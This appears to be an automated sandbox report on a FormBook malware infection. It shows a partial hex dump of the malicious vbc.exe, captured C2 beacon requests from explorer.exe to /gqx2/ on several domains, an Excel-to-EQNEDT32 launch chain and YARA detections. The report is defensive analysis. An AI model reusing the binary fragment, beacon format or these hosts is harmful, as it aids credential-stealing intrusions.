                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 e1 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e4 0d 00 00 0a 00 00 00 00 00 00 b6 02 0e 00 00 20 00 00 00 20 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 02 0e 00 4f 00 00 00 00 20 0e 00 cc 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e2 0d 00 00 20 00 00 00 e4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 cc 06 00 00 00 20 0e 00 00 08 00 00 00 e6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0e 00 00 02 00 00 00 ee 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 02 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 24 5c 01 00 03 00 00 00 01 00 00 06 bc 9f 03 00 a8 62 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`P @ `@dO @ H.text `.rsrc @@.reloc@@BHC$\b0(((o*( (!("(#($*N(op(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*&(1*0<~(2,!rp(3o4s5~+*0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:31:11.326402903 CET963OUTGET /gqx2/?FH=Z6A4l46h&LBbXpL=9/BKDbjWJTW8jFQit4UrkvSCkC6DC2Rftex5RF517dla63TUfiGzTVS9eU2a+MLpIdlY9g== HTTP/1.1
                                                                                                                                                              Host: www.inreachpt.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 07:31:11.466603041 CET963INHTTP/1.1 403 Forbidden
                                                                                                                                                              Server: openresty
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:31:11 GMT
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Content-Length: 275
                                                                                                                                                              ETag: "600b4d16-113"
                                                                                                                                                              Via: 1.1 google
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.2249167208.91.197.9180C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:31:21.841068983 CET964OUTGET /gqx2/?FH=Z6A4l46h&LBbXpL=kdwz49RbWZyfRfVFqlgC7QJtxuB/meiNTkA5ikaSnjB/7w8EYdi6OSMNUeLU1PJtCjvO1w== HTTP/1.1
                                                                                                                                                              Host: www.athleteshive.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 07:31:22.034466028 CET965INHTTP/1.1 200 OK
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:31:21 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Set-Cookie: vsid=928vr3592746819837453; expires=Mon, 26-Jan-2026 06:31:21 GMT; Max-Age=157680000; path=/; domain=www.athleteshive.com; HttpOnly
                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_oE/e+iYl6TsGzJEjuL+8jjJEHzG6QJLXRsCWMmQDJITFgbcSKDwRgNYMdykZ1gQM22XWxBBgsAO38NW//2M1jQ==
                                                                                                                                                              Content-Length: 2608
                                                                                                                                                              Keep-Alive: timeout=5, max=10
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 74 68 6c 65 74 65 73 68 69 76 65 2e 63 6f 6d 2f 3f 66 70 3d 46 6a 55 33 55 36 49 36 36 6c 35 25 32 46 6b 54 41 5a 77 69 39 34 56 6c 77 57 6d 73 39 6e 73 77 37 43 42 4e 61 66 59 72 31 35 52 41 46 69 48 46 68 4f 44 36 48 49 5a 51 25 32 42 39 63 25 32 46 72 76 56 4a 50 4a 6a 6a 6b 74 31 62 42 53 25 32 42 5a 75 78 79 54 72 38 76 51 47 51 34 37 72 52 33 25 32 46 74 6e 57 67 25 32 42 48 78 69 56 56 55 55 44 74 66 43 4f 62 63 76 64 5a 72 66 70 43 45 50 50 59 75 57 25 32 42 37 69 45 77 62 6d 76 4d 30 65 64 77 59 25 32 46 41 4e 75 70 6a 58 6d 7a 33 6d 52 57 4e 6c 6c 43 54 41 4b 37 62 66 30 43 35 6a 79 6c 50 4c 58 75 66 59 25 33 44 26 70 72 76 74 6f 66 3d 48 57 4d 45 6f 72 25 32 46 6e 6f 6e 4d 4f 51 4b 36 31 66 4f 67 6f 44 76 71 61 30 74 4c 78 68 52 4b 70 35 6b 4c 6c 6c 41 57 38 51 7a 77 25 33 44 26 70 6f 72 75 3d 54 30 36 30 68 54 64 25 32 46 54 65 50 62 45 76 68 38 6b 6d 5a 4d 65 5a 73 31 36 41 38 56 44 44 4a 47 54 6c 41 41 4e 6a 52 37 75 74 4c 4a 59 6f 34 42 57 70 63 42 44 66 70 25 32 46 73 37 4d 36 6f 52 30 4b 42 4d 65 78 74 56 6f 37 45 41 41 61 61 64 4f 72 69 67 4f 66 51 67 6d 73 25 32 46 35 54 4f 49 74 31 4b 5a 30 72 62 34 4a 33 58 43 44 57 41 59 79 43 31 7a 33 41 5a 6c 55 45 46 71 4b 74 42 50 6f 4c 36 7a 4d 4b 42 5a 39 7a 6e 6d 35 49 71 74 50 25 32 42 41 70 70 75 70 45 7a 52 41 6a 41 37 42 50 64 79 36 30 42 55 33 76 41 69 43 45 73 61 38 77 6d 46 32 6d 32 51 51 42 53 25 32 46 52 62 45 30 56 4f 69 54 45 26 63 69 66 72 3d 31 26 46 48 3d 5a 36 41 34 6c 34 36 68 26 4c 42 62 58 70 4c 3d 6b 64 77 7a 34 39 52 62 57 5a 79 66 52 66 56 46 71 6c 67 43 37 51 4a 74 78 75 42 25 32 46 6d 65 69 4e 54 6b 41 35 69 6b 61 53 6e 6a 42 25 32 46 37 77 38 45 59 64 69 36 4f 53 4d 4e 55 65 4c 55 31 50 4a 74 43 6a 76 4f 31 77 25 33 44 25 33 44 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52
                                                                                                                                                              Data Ascii: ...top.location="http://www.athleteshive.com/?fp=FjU3U6I66l5%2FkTAZwi94VlwWms9nsw7CBNafYr15RAFiHFhOD6HIZQ%2B9c%2FrvVJPJjjkt1bBS%2BZuxyTr8vQGQ47rR3%2FtnWg%2BHxiVVUUDtfCObcvdZrfpCEPPYuW%2B7iEwbmvM0edwY%2FANupjXmz3mRWNllCTAK7bf0C5jylPLXufY%3D&prvtof=HWMEor%2FnonMOQK61fOgoDvqa0tLxhRKp5kLllAW8Qzw%3D&poru=T060hTd%2FTePbEvh8kmZMeZs16A8VDDJGTlAANjR7utLJYo4BWpcBDfp%2Fs7M6oR0KBMextVo7EAAaadOrigOfQgms%2F5TOIt1KZ0rb4J3XCDWAYyC1z3AZlUEFqKtBPoL6zMKBZ9znm5IqtP%2BAppupEzRAjA7BPdy60BU3vAiCEsa8wmF2m2QQBS%2FRbE0VOiTE&cifr=1&FH=Z6A4l46h&LBbXpL=kdwz49RbWZyfRfVFqlgC7QJtxuB%2FmeiNTkA5ikaSnjB%2F7w8EYdi6OSMNUeLU1PJtCjvO1w%3D%3D";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCR


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.224916844.240.171.17280C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:31:27.350853920 CET969OUTGET /gqx2/?LBbXpL=NDTQX7mapLrAPB2lUlM56Hgg+STWZd9aU5/K481bOg5ERhcI1aoDeCBobL4shdqJetw+0A==&FH=Z6A4l46h HTTP/1.1
                                                                                                                                                              Host: www.calusaptamiami.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 07:31:27.580075026 CET970INHTTP/1.1 303 See Other
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:31:27 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: AWSALB=nQGs/EoNgsLnOIouuOh00fr4WX6FdOvp0KqfJo2eFlA9I2GPDs0bmkGFNLO1oqLj8ceMRw3z67+ixmeGk2Z8CuJ1aA5v5T2Gu+LfFlC+lnuFvQ3sTbTCBsBUajb3; Expires=Wed, 03 Feb 2021 06:31:27 GMT; Path=/
                                                                                                                                                              Set-Cookie: AWSALBCORS=nQGs/EoNgsLnOIouuOh00fr4WX6FdOvp0KqfJo2eFlA9I2GPDs0bmkGFNLO1oqLj8ceMRw3z67+ixmeGk2Z8CuJ1aA5v5T2Gu+LfFlC+lnuFvQ3sTbTCBsBUajb3; Expires=Wed, 03 Feb 2021 06:31:27 GMT; Path=/; SameSite=None
                                                                                                                                                              Server: nginx/1.12.1
                                                                                                                                                              Set-Cookie: PHPSESSID=p80lihgr6cm5r6hs41r28t9bep; expires=Fri, 26-Feb-2021 06:31:27 GMT; Max-Age=2592000; path=/; samesite=Lax; domain=.membershiptoolkit.com; secure; HttpOnly
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Set-Cookie: machine-id-membershiptoolkit=MTKbcadc2a1d45e59fb68175f1dd820eb1c-1611729087; expires=Tue, 19-Jan-2038 03:14:07 GMT; Max-Age=535754560; path=/; domain=.membershiptoolkit.com; secure; HttpOnly
                                                                                                                                                              location: https://calusapta.membershiptoolkit.com/gqx2/?LBbXpL=NDTQX7mapLrAPB2lUlM56Hgg+STWZd9aU5/K481bOg5ERhcI1aoDeCBobL4shdqJetw+0A==&FH=Z6A4l46h
                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.2249169192.185.35.7680C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:31:32.963877916 CET971OUTGET /gqx2/?FH=Z6A4l46h&LBbXpL=+3QoYFPEqRNlZMzGaFhuJ6Cz2rhEMAU1T5a3j4/+hda+nWQNJZmKanwic2T+mI2t6bc5xQ== HTTP/1.1
                                                                                                                                                              Host: www.shuhan.design
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 07:31:33.195858955 CET972INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:31:33 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                              Last-Modified: Tue, 23 Apr 2019 06:05:22 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 746
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; margin-top: 4em; line-height: 1.5;"> Sorry, this page doesn't exist.<br>Please check the URL or go back a page. </h1> <h2 style=" font-family: Verdana, sans-serif; color: #7d7d7d; font-weight: 300;"> 404 Error. Page Not Found. </h2> </body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.2249170154.196.151.2580C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:31:38.792879105 CET973OUTGET /gqx2/?LBbXpL=3W3cVsor3bbPfna0qFofS9YXWKP/R6dcaODyRhEFOp9LvKZJ8f2uexAIjRYYCLBPm+vppg==&FH=Z6A4l46h HTTP/1.1
                                                                                                                                                              Host: www.rentfs.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 07:31:39.023871899 CET973INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:31:38 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 1.0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.2249171166.62.29.4280C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Jan 27, 2021 07:31:44.337500095 CET974OUTGET /gqx2/?FH=Z6A4l46h&LBbXpL=6nuUJCCL996uhukPA9n93qtc4x9+JW7PXVvZwiYzKnuHGI26xL3B8i1MOW2JBaaNxWuU1g== HTTP/1.1
                                                                                                                                                              Host: www.trijjadigital.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Jan 27, 2021 07:31:45.751564980 CET975INHTTP/1.1 301 Moved Permanently
                                                                                                                                                              Date: Wed, 27 Jan 2021 06:31:44 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              X-Powered-By: PHP/7.3.23
                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                              Location: http://trijjadigital.com/gqx2/?FH=Z6A4l46h&LBbXpL=6nuUJCCL996uhukPA9n93qtc4x9+JW7PXVvZwiYzKnuHGI26xL3B8i1MOW2JBaaNxWuU1g==
                                                                                                                                                              Vary: User-Agent
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Start time:07:29:52
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x13fe90000
                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:07:30:12
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:543304 bytes
                                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:07:30:15
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                              File size:913408 bytes
                                                                                                                                                              MD5 hash:2B72BC4BA9645AF5482661C5D1D1C7F8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2165883965.0000000002301000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2166013985.0000000003308000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:07:30:16
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                              File size:913408 bytes
                                                                                                                                                              MD5 hash:2B72BC4BA9645AF5482661C5D1D1C7F8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218235916.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218311056.0000000000330000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218333156.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
